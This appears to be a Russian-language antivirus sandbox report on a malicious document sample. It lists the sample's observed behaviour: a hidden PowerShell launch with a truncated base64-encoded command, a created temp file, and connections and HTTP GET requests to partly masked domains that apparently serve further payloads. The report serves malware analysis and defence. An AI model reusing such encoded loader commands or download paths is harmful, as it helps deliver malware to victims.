Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1246978.cvr
Сетевая активность
Подключается к
- 'ri####nterprise.com':80
- 'ri####nterprise.com':443
- 're###aster.com':80
- 're###aster.com':443
- 'po####sgn.com.br':80
- 're###flight.be':80
- 'pu##r.nl':443
TCP
Запросы HTTP GET
- http://ri####nterprise.com/dist/go/0Ay/
- http://re###aster.com/antiguo/WA/
- http://po####sgn.com.br/corpore/xl/
- http://re###flight.be/PEAR2_maybe_not_used/H9l5C9Q/
Другие
- 'ri####nterprise.com':443
- 're###aster.com':443
- 'pu##r.nl':443
UDP
- DNS ASK ri####nterprise.com
- DNS ASK pr#####ollection.com
- DNS ASK re###aster.com
- DNS ASK po####sgn.com.br
- DNS ASK re###flight.be
- DNS ASK pi###.unixstorm.org
- DNS ASK pu##r.nl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)
